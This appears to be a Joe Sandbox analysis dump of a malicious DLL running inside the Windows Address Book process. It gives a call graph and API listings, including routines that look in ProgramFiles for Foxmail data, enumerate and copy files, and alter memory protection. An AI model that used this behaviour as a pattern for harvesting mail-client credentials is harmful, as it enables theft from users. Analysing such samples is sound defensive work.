6961->6962 6963 222e8665 6961->6963 6964 222e8681 6962->6964 6967 222e8693 6962->6967 6965 222e6368 __dosmaperr 20 API calls 6963->6965 6966 222e6368 __dosmaperr 20 API calls 6964->6966 6968 222e866a 6965->6968 6969 222e8686 6966->6969 6973 222e8652 6967->6973 6974 222e54a7 6967->6974 6971 222e62ac _abort 26 API calls 6968->6971 6972 222e62ac _abort 26 API calls 6969->6972 6971->6973 6972->6973 6975 222e54c4 6974->6975 6981 222e54ba 6974->6981 6976 222e5af6 _abort 38 API calls 6975->6976 6975->6981 6977 222e54e5 6976->6977 6978 222e7a00 __fassign 38 API calls 6977->6978 6979 222e54fe 6978->6979 6982 222e7a2d 6979->6982 6981->6973 6983 222e7a55 6982->6983 6984 222e7a40 6982->6984 6983->6981 6984->6983 6986 222e6d7e 6984->6986 6987 222e6d8a ___DestructExceptionObject 6986->6987 6988 222e5af6 _abort 38 API calls 6987->6988 6990 222e6d94 6988->6990 6991 222e6e18 _abort 6990->6991 6992 222e55a8 _abort 38 API calls 6990->6992 6994 222e571e _free 20 API calls 6990->6994 6995 222e5671 RtlEnterCriticalSection 6990->6995 6996 222e6e0f 6990->6996 6991->6983 6992->6990 6994->6990 6995->6990 6999 222e56b9 RtlLeaveCriticalSection 6996->6999 6998 222e6e16 6998->6990 6999->6998 7268 222e7a80 7269 222e7a8d 7268->7269 7270 222e637b _abort 20 API calls 7269->7270 7271 222e7aa7 7270->7271 7272 222e571e _free 20 API calls 7271->7272 7273 222e7ab3 7272->7273 7274 222e637b _abort 20 API calls 7273->7274 7278 222e7ad9 7273->7278 7275 222e7acd 7274->7275 7277 222e571e _free 20 API calls 7275->7277 7276 222e5eb7 11 API calls 7276->7278 7277->7278 7278->7276 7279 222e7ae5 7278->7279 6397 222e281c 6400 222e2882 6397->6400 6403 222e3550 6400->6403 6402 222e282a 6404 222e355d 6403->6404 6408 222e358a 6403->6408 6405 222e47e5 ___std_exception_copy 21 API calls 6404->6405 6404->6408 6406 222e357a 6405->6406 6406->6408 6409 222e544d 6406->6409 6408->6402 6410 222e545a 6409->6410 6411 222e5468 6409->6411 6410->6411 6414 222e547f 6410->6414 6412 222e6368 __dosmaperr 20 API calls 6411->6412 6417 
222e5470 6412->6417 6413 222e62ac _abort 26 API calls 6415 222e547a 6413->6415 6414->6415 6416 222e6368 __dosmaperr 20 API calls 6414->6416 6415->6408 6416->6417 6417->6413 7490 222e4bdd 7491 222e4bec 7490->7491 7492 222e4c08 7490->7492 7491->7492 7493 222e4bf2 7491->7493 7494 222e6d60 51 API calls 7492->7494 7495 222e6368 __dosmaperr 20 API calls 7493->7495 7496 222e4c0f GetModuleFileNameA 7494->7496 7497 222e4bf7 7495->7497 7498 222e4c33 7496->7498 7499 222e62ac _abort 26 API calls 7497->7499 7513 222e4d01 7498->7513 7500 222e4c01 7499->7500 7503 222e4e76 20 API calls 7504 222e4c5d 7503->7504 7505 222e4c66 7504->7505 7506 222e4c72 7504->7506 7507 222e6368 __dosmaperr 20 API calls 7505->7507 7508 222e4d01 38 API calls 7506->7508 7512 222e4c6b 7507->7512 7510 222e4c88 7508->7510 7509 222e571e _free 20 API calls 7509->7500 7511 222e571e _free 20 API calls 7510->7511 7510->7512 7511->7512 7512->7509 7515 222e4d26 7513->7515 7517 222e4d86 7515->7517 7519 222e70eb 7515->7519 7516 222e4c50 7516->7503 7517->7516 7518 222e70eb 38 API calls 7517->7518 7518->7517 7522 222e7092 7519->7522 7523 222e54a7 __fassign 38 API calls 7522->7523 7524 222e70a6 7523->7524 7524->7515 7280 222e4a9a 7281 222e5411 38 API calls 7280->7281 7282 222e4aa2 7281->7282 5746 222e1c5b 5747 222e1c6b ___scrt_fastfail 5746->5747 5750 222e12ee 5747->5750 5749 222e1c87 5751 222e1324 ___scrt_fastfail 5750->5751 5752 222e13b7 GetEnvironmentVariableW 5751->5752 5776 222e10f1 5752->5776 5755 222e10f1 57 API calls 5756 222e1465 5755->5756 5757 222e10f1 57 API calls 5756->5757 5758 222e1479 5757->5758 5759 222e10f1 57 API calls 5758->5759 5760 222e148d 5759->5760 5761 222e10f1 57 API calls 5760->5761 5762 222e14a1 5761->5762 5763 222e10f1 57 API calls 5762->5763 5764 222e14b5 lstrlenW 5763->5764 5765 222e14d9 lstrlenW 5764->5765 5766 222e14d2 5764->5766 5767 222e10f1 57 API calls 5765->5767 5766->5749 5768 222e1501 lstrlenW lstrcatW 5767->5768 5769 222e10f1 57 API calls 5768->5769 5770 222e1539 lstrlenW 
lstrcatW 5769->5770 5771 222e10f1 57 API calls 5770->5771 5772 222e156b lstrlenW lstrcatW 5771->5772 5773 222e10f1 57 API calls 5772->5773 5774 222e159d lstrlenW lstrcatW 5773->5774 5775 222e10f1 57 API calls 5774->5775 5775->5766 5777 222e1118 ___scrt_fastfail 5776->5777 5778 222e1129 lstrlenW 5777->5778 5789 222e2c40 5778->5789 5781 222e1168 lstrlenW 5782 222e1177 lstrlenW FindFirstFileW 5781->5782 5783 222e11a0 5782->5783 5784 222e11e1 5782->5784 5785 222e11aa 5783->5785 5786 222e11c7 FindNextFileW 5783->5786 5784->5755 5785->5786 5791 222e1000 5785->5791 5786->5783 5787 222e11da FindClose 5786->5787 5787->5784 5790 222e1148 lstrcatW lstrlenW 5789->5790 5790->5781 5790->5782 5792 222e1022 ___scrt_fastfail 5791->5792 5793 222e10af 5792->5793 5794 222e102f lstrcatW lstrlenW 5792->5794 5795 222e10b5 lstrlenW 5793->5795 5806 222e10ad 5793->5806 5796 222e105a lstrlenW 5794->5796 5797 222e106b lstrlenW 5794->5797 5822 222e1e16 5795->5822 5796->5797 5808 222e1e89 lstrlenW 5797->5808 5800 222e1088 GetFileAttributesW 5802 222e109c 5800->5802 5800->5806 5801 222e10ca 5803 222e1e89 5 API calls 5801->5803 5801->5806 5802->5806 5814 222e173a 5802->5814 5805 222e10df 5803->5805 5827 222e11ea 5805->5827 5806->5785 5809 222e2c40 ___scrt_fastfail 5808->5809 5810 222e1ea7 lstrcatW lstrlenW 5809->5810 5811 222e1ec2 5810->5811 5812 222e1ed1 lstrcatW 5810->5812 5811->5812 5813 222e1ec7 lstrlenW 5811->5813 5812->5800 5813->5812 5815 222e1747 ___scrt_fastfail 5814->5815 5842 222e1cca 5815->5842 5819 222e199f 5819->5806 5821 222e1824 ___scrt_fastfail _strlen 5821->5819 5862 222e15da 5821->5862 5823 222e1e29 5822->5823 5826 222e1e4c 5822->5826 5824 222e1e2d lstrlenW 5823->5824 5823->5826 5825 222e1e3f lstrlenW 5824->5825 5824->5826 5825->5826 5826->5801 5828 222e120e ___scrt_fastfail 5827->5828 5829 222e1e89 5 API calls 5828->5829 5830 222e1220 GetFileAttributesW 5829->5830 5831 222e1246 5830->5831 5832 222e1235 5830->5832 5833 222e1e89 5 API calls 5831->5833 5832->5831 5834 222e173a 35 
API calls 5832->5834 5835 222e1258 5833->5835 5834->5831 5836 222e10f1 56 API calls 5835->5836 5837 222e126d 5836->5837 5838 222e1e89 5 API calls 5837->5838 5839 222e127f ___scrt_fastfail 5838->5839 5840 222e10f1 56 API calls 5839->5840 5841 222e12e6 5840->5841 5841->5806 5843 222e1cf1 ___scrt_fastfail 5842->5843 5844 222e1d0f CopyFileW CreateFileW 5843->5844 5845 222e1d44 DeleteFileW 5844->5845 5846 222e1d55 GetFileSize 5844->5846 5851 222e1808 5845->5851 5847 222e1ede 22 API calls 5846->5847 5848 222e1d66 ReadFile 5847->5848 5849 222e1d7d CloseHandle DeleteFileW 5848->5849 5850 222e1d94 CloseHandle DeleteFileW 5848->5850 5849->5851 5850->5851 5851->5819 5852 222e1ede 5851->5852 5854 222e222f 5852->5854 5855 222e224e 5854->5855 5858 222e2250 5854->5858 5870 222e474f 5854->5870 5875 222e47e5 5854->5875 5855->5821 5857 222e2908 5859 222e35d2 __CxxThrowException@8 RaiseException 5857->5859 5858->5857 5882 222e35d2 5858->5882 5861 222e2925 5859->5861 5861->5821 5863 222e160c _strcat _strlen 5862->5863 5864 222e163c lstrlenW 5863->5864 5970 222e1c9d 5864->5970 5866 222e1655 lstrcatW lstrlenW 5867 222e1678 5866->5867 5868 222e167e lstrcatW 5867->5868 5869 222e1693 ___scrt_fastfail 5867->5869 5868->5869 5869->5821 5885 222e4793 5870->5885 5873 222e478f 5873->5854 5874 222e4765 5891 222e2ada 5874->5891 5880 222e56d0 _abort 5875->5880 5876 222e570e 5904 222e6368 5876->5904 5877 222e56f9 RtlAllocateHeap 5879 222e570c 5877->5879 5877->5880 5879->5854 5880->5876 5880->5877 5881 222e474f _abort 7 API calls 5880->5881 5881->5880 5883 222e35f2 RaiseException 5882->5883 5883->5857 5886 222e479f ___DestructExceptionObject 5885->5886 5898 222e5671 RtlEnterCriticalSection 5886->5898 5888 222e47aa 5899 222e47dc 5888->5899 5890 222e47d1 _abort 5890->5874 5892 222e2ae5 IsProcessorFeaturePresent 5891->5892 5893 222e2ae3 5891->5893 5895 222e2b58 5892->5895 5893->5873 5903 222e2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5895->5903 5897 
222e2c3b 5897->5873 5898->5888 5902 222e56b9 RtlLeaveCriticalSection 5899->5902 5901 222e47e3 5901->5890 5902->5901 5903->5897 5907 222e5b7a GetLastError 5904->5907 5908 222e5b99 5907->5908 5909 222e5b93 5907->5909 5913 222e5bf0 SetLastError 5908->5913 5933 222e637b 5908->5933 5926 222e5e08 5909->5926 5916 222e5bf9 5913->5916 5914 222e5bb3 5940 222e571e 5914->5940 5916->5879 5919 222e5bb9 5921 222e5be7 SetLastError 5919->5921 5920 222e5bcf 5953 222e593c 5920->5953 5921->5916 5924 222e571e _free 17 API calls 5925 222e5be0 5924->5925 5925->5913 5925->5921 5958 222e5c45 5926->5958 5928 222e5e2f 5929 222e5e47 TlsGetValue 5928->5929 5930 222e5e3b 5928->5930 5929->5930 5931 222e2ada _ValidateLocalCookies 5 API calls 5930->5931 5932 222e5e58 5931->5932 5932->5908 5938 222e6388 _abort 5933->5938 5934 222e63c8 5937 222e6368 __dosmaperr 19 API calls 5934->5937 5935 222e63b3 RtlAllocateHeap 5936 222e5bab 5935->5936 5935->5938 5936->5914 5946 222e5e5e 5936->5946 5937->5936 5938->5934 5938->5935 5939 222e474f _abort 7 API calls 5938->5939 5939->5938 5941 222e5729 HeapFree 5940->5941 5942 222e5752 __dosmaperr 5940->5942 5941->5942 5943 222e573e 5941->5943 5942->5919 5944 222e6368 __dosmaperr 18 API calls 5943->5944 5945 222e5744 GetLastError 5944->5945 5945->5942 5947 222e5c45 _abort 5 API calls 5946->5947 5948 222e5e85 5947->5948 5949 222e5ea0 TlsSetValue 5948->5949 5950 222e5e94 5948->5950 5949->5950 5951 222e2ada _ValidateLocalCookies 5 API calls 5950->5951 5952 222e5bc8 5951->5952 5952->5914 5952->5920 5964 222e5914 5953->5964 5961 222e5c71 5958->5961 5963 222e5c75 __crt_fast_encode_pointer 5958->5963 5959 222e5c95 5962 222e5ca1 GetProcAddress 5959->5962 5959->5963 5960 222e5ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 5960->5961 5961->5959 5961->5960 5961->5963 5962->5963 5963->5928 5965 222e5854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 5964->5965 5966 222e5938 5965->5966 5967 222e58c4 5966->5967 5968 222e5758 _abort 20 API calls 
5967->5968 5969 222e58e8 5968->5969 5969->5924 5971 222e1ca6 _strlen 5970->5971 5971->5866 7525 222e20db 7526 222e20e7 ___DestructExceptionObject 7525->7526 7527 222e2110 dllmain_raw 7526->7527 7532 222e210b 7526->7532 7537 222e20f6 7526->7537 7528 222e212a 7527->7528 7527->7537 7538 222e1eec 7528->7538 7530 222e2177 7531 222e1eec 31 API calls 7530->7531 7530->7537 7533 222e218a 7531->7533 7532->7530 7534 222e1eec 31 API calls 7532->7534 7532->7537 7535 222e2193 dllmain_raw 7533->7535 7533->7537 7536 222e216d dllmain_raw 7534->7536 7535->7537 7536->7530 7539 222e1f2a dllmain_crt_process_detach 7538->7539 7540 222e1ef7 7538->7540 7541 222e1f06 7539->7541 7542 222e1f1c dllmain_crt_process_attach 7540->7542 7543 222e1efc 7540->7543 7541->7532 7542->7541 7544 222e1f12 7543->7544 7545 222e1f01 7543->7545 7553 222e23ec 7544->7553 7545->7541 7548 222e240b 7545->7548 7561 222e53e5 7548->7561 7654 222e3513 7553->7654 7556 222e23f5 7556->7541 7559 222e2408 7559->7541 7560 222e351e 7 API calls 7560->7556 7567 222e5aca 7561->7567 7564 222e351e 7643 222e3820 7564->7643 7566 222e2415 7566->7541 7568 222e5ad4 7567->7568 7569 222e2410 7567->7569 7570 222e5e08 _abort 11 API calls 7568->7570 7569->7564 7571 222e5adb 7570->7571 7571->7569 7572 222e5e5e _abort 11 API calls 7571->7572 7573 222e5aee 7572->7573 7575 222e59b5 7573->7575 7576 222e59d0 7575->7576 7577 222e59c0 7575->7577 7576->7569 7581 222e59d6 7577->7581 7580 222e571e _free 20 API calls 7580->7576 7582 222e59e9 7581->7582 7583 222e59ef 7581->7583 7584 222e571e _free 20 API calls 7582->7584 7585 222e571e _free 20 API calls 7583->7585 7584->7583 7586 222e59fb 7585->7586 7587 222e571e _free 20 API calls 7586->7587 7588 222e5a06 7587->7588 7589 222e571e _free 20 API calls 7588->7589 7590 222e5a11 7589->7590 7591 222e571e _free 20 API calls 7590->7591 7592 222e5a1c 7591->7592 7593 222e571e _free 20 API calls 7592->7593 7594 222e5a27 7593->7594 7595 222e571e _free 20 API calls 7594->7595 7596 222e5a32 7595->7596 7597 222e571e 
_free 20 API calls 7596->7597 7598 222e5a3d 7597->7598 7599 222e571e _free 20 API calls 7598->7599 7600 222e5a48 7599->7600 7601 222e571e _free 20 API calls 7600->7601 7602 222e5a56 7601->7602 7607 222e589c 7602->7607 7613 222e57a8 7607->7613 7609 222e58c0 7610 222e58ec 7609->7610 7626 222e5809 7610->7626 7612 222e5910 7612->7580 7614 222e57b4 ___DestructExceptionObject 7613->7614 7621 222e5671 RtlEnterCriticalSection 7614->7621 7616 222e57e8 7622 222e57fd 7616->7622 7618 222e57f5 _abort 7618->7609 7619 222e57be 7619->7616 7620 222e571e _free 20 API calls 7619->7620 7620->7616 7621->7619 7625 222e56b9 RtlLeaveCriticalSection 7622->7625 7624 222e5807 7624->7618 7625->7624 7627 222e5815 ___DestructExceptionObject 7626->7627 7634 222e5671 RtlEnterCriticalSection 7627->7634 7629 222e581f 7635 222e5a7f 7629->7635 7631 222e5832 7639 222e5848 7631->7639 7633 222e5840 _abort 7633->7612 7634->7629 7636 222e5ab5 __fassign 7635->7636 7637 222e5a8e __fassign 7635->7637 7636->7631 7637->7636 7638 222e7cc2 __fassign 20 API calls 7637->7638 7638->7636 7642 222e56b9 RtlLeaveCriticalSection 7639->7642 7641 222e5852 7641->7633 7642->7641 7644 222e382d 7643->7644 7648 222e384b ___vcrt_freefls@4 7643->7648 7645 222e383b 7644->7645 7649 222e3b67 7644->7649 7647 222e3ba2 ___vcrt_FlsSetValue 6 API calls 7645->7647 7647->7648 7648->7566 7650 222e3a82 try_get_function 5 API calls 7649->7650 7651 222e3b81 7650->7651 7652 222e3b99 TlsGetValue 7651->7652 7653 222e3b8d 7651->7653 7652->7653 7653->7645 7660 222e3856 7654->7660 7656 222e23f1 7656->7556 7657 222e53da 7656->7657 7658 222e5b7a _abort 20 API calls 7657->7658 7659 222e23fd 7658->7659 7659->7559 7659->7560 7661 222e385f 7660->7661 7662 222e3862 GetLastError 7660->7662 7661->7656 7663 222e3b67 ___vcrt_FlsGetValue 6 API calls 7662->7663 7664 222e3877 7663->7664 7665 222e38dc SetLastError 7664->7665 7666 222e3ba2 ___vcrt_FlsSetValue 6 API calls 7664->7666 7671 222e3896 7664->7671 7665->7656 7667 222e3890 7666->7667 7668 222e38b8 
7667->7668 7669 222e3ba2 ___vcrt_FlsSetValue 6 API calls 7667->7669 7667->7671 7670 222e3ba2 ___vcrt_FlsSetValue 6 API calls 7668->7670 7668->7671 7669->7668 7670->7671 7671->7665 6418 222e2418 6419 222e2420 ___scrt_release_startup_lock 6418->6419 6422 222e47f5 6419->6422 6421 222e2448 6423 222e4808 6422->6423 6424 222e4804 6422->6424 6427 222e4815 6423->6427 6424->6421 6428 222e5b7a _abort 20 API calls 6427->6428 6431 222e482c 6428->6431 6429 222e2ada _ValidateLocalCookies 5 API calls 6430 222e4811 6429->6430 6430->6421 6431->6429 7672 222e4ed7 7673 222e6d60 51 API calls 7672->7673 7674 222e4ee9 7673->7674 7683 222e7153 GetEnvironmentStringsW 7674->7683 7677 222e4ef4 7679 222e571e _free 20 API calls 7677->7679 7680 222e4f29 7679->7680 7681 222e4eff 7682 222e571e _free 20 API calls 7681->7682 7682->7677 7684 222e716a 7683->7684 7694 222e71bd 7683->7694 7687 222e7170 WideCharToMultiByte 7684->7687 7685 222e4eee 7685->7677 7695 222e4f2f 7685->7695 7686 222e71c6 FreeEnvironmentStringsW 7686->7685 7688 222e718c 7687->7688 7687->7694 7689 222e56d0 21 API calls 7688->7689 7690 222e7192 7689->7690 7691 222e7199 WideCharToMultiByte 7690->7691 7692 222e71af 7690->7692 7691->7692 7693 222e571e _free 20 API calls 7692->7693 7693->7694 7694->7685 7694->7686 7696 222e4f44 7695->7696 7697 222e637b _abort 20 API calls 7696->7697 7698 222e4f6b 7697->7698 7699 222e4fcf 7698->7699 7702 222e637b _abort 20 API calls 7698->7702 7703 222e4fd1 7698->7703 7705 222e544d ___std_exception_copy 26 API calls 7698->7705 7708 222e4ff3 7698->7708 7710 222e571e _free 20 API calls 7698->7710 7700 222e571e _free 20 API calls 7699->7700 7701 222e4fe9 7700->7701 7701->7681 7702->7698 7704 222e5000 20 API calls 7703->7704 7706 222e4fd7 7704->7706 7705->7698 7707 222e571e _free 20 API calls 7706->7707 7707->7699 7709 222e62bc _abort 11 API calls 7708->7709 7711 222e4fff 7709->7711 7710->7698 7712 222e73d5 7713 222e73e1 ___DestructExceptionObject 7712->7713 7724 222e5671 RtlEnterCriticalSection 
7713->7724 7715 222e73e8 7725 222e8be3 7715->7725 7717 222e73f7 7718 222e7406 7717->7718 7738 222e7269 GetStartupInfoW 7717->7738 7749 222e7422 7718->7749 7721 222e7417 _abort 7724->7715 7726 222e8bef ___DestructExceptionObject 7725->7726 7727 222e8bfc 7726->7727 7728 222e8c13 7726->7728 7730 222e6368 __dosmaperr 20 API calls 7727->7730 7752 222e5671 RtlEnterCriticalSection 7728->7752 7732 222e8c01 7730->7732 7731 222e8c1f 7737 222e8c4b 7731->7737 7753 222e8b34 7731->7753 7733 222e62ac _abort 26 API calls 7732->7733 7735 222e8c0b _abort 7733->7735 7735->7717 7760 222e8c72 7737->7760 7739 222e7318 7738->7739 7740 222e7286 7738->7740 7744 222e731f 7739->7744 7740->7739 7741 222e8be3 27 API calls 7740->7741 7742 222e72af 7741->7742 7742->7739 7743 222e72dd GetFileType 7742->7743 7743->7742 7745 222e7326 7744->7745 7746 222e7369 GetStdHandle 7745->7746 7747 222e73d1 7745->7747 7748 222e737c GetFileType 7745->7748 7746->7745 7747->7718 7748->7745 7764 222e56b9 RtlLeaveCriticalSection 7749->7764 7751 222e7429 7751->7721 7752->7731 7754 222e637b _abort 20 API calls 7753->7754 7756 222e8b46 7754->7756 7755 222e8b53 7757 222e571e _free 20 API calls 7755->7757 7756->7755 7758 222e5eb7 11 API calls 7756->7758 7759 222e8ba5 7757->7759 7758->7756 7759->7731 7763 222e56b9 RtlLeaveCriticalSection 7760->7763 7762 222e8c79 7762->7735 7763->7762 7764->7751 7283 222e3c90 RtlUnwind 7765 222e36d0 7766 222e36e2 7765->7766 7768 222e36f0 @_EH4_CallFilterFunc@8 7765->7768 7767 222e2ada _ValidateLocalCookies 5 API calls 7766->7767 7767->7768 7000 222e5351 7001 222e5374 7000->7001 7002 222e5360 7000->7002 7003 222e571e _free 20 API calls 7001->7003 7002->7001 7004 222e571e _free 20 API calls 7002->7004 7005 222e5386 7003->7005 7004->7001 7006 222e571e _free 20 API calls 7005->7006 7007 222e5399 7006->7007 7008 222e571e _free 20 API calls 7007->7008 7009 222e53aa 7008->7009 7010 222e571e _free 20 API calls 7009->7010 7011 222e53bb 7010->7011

                                                Control-flow Graph

                                                APIs
                                                • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 222E1137
                                                • lstrcatW.KERNEL32(?,?), ref: 222E1151
                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 222E115C
                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 222E116D
                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 222E117C
                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 222E1193
                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 222E11D0
                                                • FindClose.KERNEL32(00000000), ref: 222E11DB
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                • String ID:
                                                • API String ID: 1083526818-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 222E1434
                                                  • Part of subcall function 222E10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 222E1137
                                                  • Part of subcall function 222E10F1: lstrcatW.KERNEL32(?,?), ref: 222E1151
                                                  • Part of subcall function 222E10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 222E115C
                                                  • Part of subcall function 222E10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 222E116D
                                                  • Part of subcall function 222E10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 222E117C
                                                  • Part of subcall function 222E10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 222E1193
                                                  • Part of subcall function 222E10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 222E11D0
                                                  • Part of subcall function 222E10F1: FindClose.KERNEL32(00000000), ref: 222E11DB
                                                • lstrlenW.KERNEL32(?), ref: 222E14C5
                                                • lstrlenW.KERNEL32(?), ref: 222E14E0
                                                • lstrlenW.KERNEL32(?,?), ref: 222E150F
                                                • lstrcatW.KERNEL32(00000000), ref: 222E1521
                                                • lstrlenW.KERNEL32(?,?), ref: 222E1547
                                                • lstrcatW.KERNEL32(00000000), ref: 222E1553
                                                • lstrlenW.KERNEL32(?,?), ref: 222E1579
                                                • lstrcatW.KERNEL32(00000000), ref: 222E1585
                                                • lstrlenW.KERNEL32(?,?), ref: 222E15AB
                                                • lstrcatW.KERNEL32(00000000), ref: 222E15B7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                • String ID: )$Foxmail$ProgramFiles
                                                • API String ID: 672098462-2938083778
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleA.KERNEL32(222EC7DD), ref: 222EC7E6
                                                • GetModuleHandleA.KERNEL32(?,222EC7DD), ref: 222EC838
                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 222EC860
                                                  • Part of subcall function 222EC803: GetProcAddress.KERNEL32(00000000,222EC7F4), ref: 222EC804
                                                  • Part of subcall function 222EC803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,222EC7F4,222EC7DD), ref: 222EC816
                                                  • Part of subcall function 222EC803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,222EC7F4,222EC7DD), ref: 222EC82A
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                • String ID:
                                                • API String ID: 2099061454-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,222EC7DD), ref: 222EC838
                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 222EC860
                                                  • Part of subcall function 222EC7E6: GetModuleHandleA.KERNEL32(222EC7DD), ref: 222EC7E6
                                                  • Part of subcall function 222EC7E6: GetProcAddress.KERNEL32(00000000,222EC7F4), ref: 222EC804
                                                  • Part of subcall function 222EC7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,222EC7F4,222EC7DD), ref: 222EC816
                                                  • Part of subcall function 222EC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,222EC7F4,222EC7DD), ref: 222EC82A
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                • String ID:
                                                • API String ID: 2099061454-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetProcAddress.KERNEL32(00000000,222EC7F4), ref: 222EC804
                                                • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,222EC7F4,222EC7DD), ref: 222EC816
                                                • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,222EC7F4,222EC7DD), ref: 222EC82A
                                                • GetModuleHandleA.KERNEL32(?,222EC7DD), ref: 222EC838
                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 222EC860
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: AddressProcProtectVirtual$HandleModule
                                                • String ID:
                                                • API String ID: 2152742572-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 222E61DA
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 222E61E4
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 222E61F1
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID:
                                                • API String ID: 3906539128-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetCurrentProcess.KERNEL32(?,?,222E4A8A,?,222F2238,0000000C,222E4BBD,00000000,00000000,00000001,222E2082,222F2108,0000000C,222E1F3A,?), ref: 222E4AD5
                                                • TerminateProcess.KERNEL32(00000000,?,222E4A8A,?,222F2238,0000000C,222E4BBD,00000000,00000000,00000001,222E2082,222F2108,0000000C,222E1F3A,?), ref: 222E4ADC
                                                • ExitProcess.KERNEL32 ref: 222E4AEE
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
